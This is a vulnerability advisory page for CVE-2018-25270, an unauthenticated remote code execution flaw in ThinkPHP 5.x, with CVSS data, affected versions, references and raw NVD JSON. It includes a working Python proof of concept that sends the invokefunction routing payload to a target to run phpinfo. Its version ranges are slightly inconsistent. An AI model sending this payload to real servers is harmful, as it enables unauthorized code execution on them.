Security Vulnerability Report
中文
CVE-2018-25270 CVSS 9.8 CRITICAL

CVE-2018-25270

Published: 2026-04-22 16:16:48
Last Modified: 2026-04-27 17:20:14
Source: [email protected]

Description

ThinkPHP 5.0.23 contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary PHP code by invoking functions through the routing parameter. Attackers can craft requests to the index.php endpoint with malicious function parameters to execute system commands with application privileges.

CVSS Details

CVSS Score
9.8
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:thinkphp:thinkphp:5.1.31:*:*:*:*:*:*:* - VULNERABLE
ThinkPHP 5.0.23
ThinkPHP 5.0.x < 5.0.24
ThinkPHP 5.1.x < 5.1.31

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 import requests def check_vuln(target_url): """ PoC for CVE-2018-25270 (ThinkPHP RCE via invokefunction) """ # The payload attempts to execute 'phpinfo()' # s=/index/\think\app/invokefunction # function=call_user_func_array # vars[0]=phpinfo # vars[1][]=1 payload = { "s": "/index/\\think\\app/invokefunction", "function": "call_user_func_array", "vars[0]": "phpinfo", "vars[1][]": "1" } try: # Sending GET request response = requests.get(target_url, params=payload, timeout=5) # Checking if phpinfo output is present in the response if response.status_code == 200 and "PHP Version" in response.text: print("[+] Target is vulnerable! RCE successful.") return True else: print("[-] Target appears not vulnerable or patched.") return False except requests.RequestException as e: print(f"[!] Error connecting to target: {e}") return False if __name__ == "__main__": url = input("Enter target URL (e.g., http://localhost/index.php): ") check_vuln(url)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2018-25270", "sourceIdentifier": "[email protected]", "published": "2026-04-22T16:16:47.770", "lastModified": "2026-04-27T17:20:13.943", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ThinkPHP 5.0.23 contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary PHP code by invoking functions through the routing parameter. Attackers can craft requests to the index.php endpoint with malicious function parameters to execute system commands with application privileges."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.3, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-639"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.0.0", "versionEndExcluding": "5.0.23", "matchCriteriaId": "6A446508-6496-48D8-8B12-67C3BA6563C5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:thinkphp:thinkphp:5.1.31:*:*:*:*:*:*:*", "matchCriteriaId": "838FA874-D91B-4CCC-BF17-D1C058AF2FCA"}]}]}], "references": [{"url": "https://github.com/top-think/framework/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://thinkphp.cn", "source": "[email protected]", "tags": ["Broken Link"]}, {"url": "https://www.exploit-db.com/exploits/45978", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/thinkphp-remote-code-execution-via-invokefunction", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.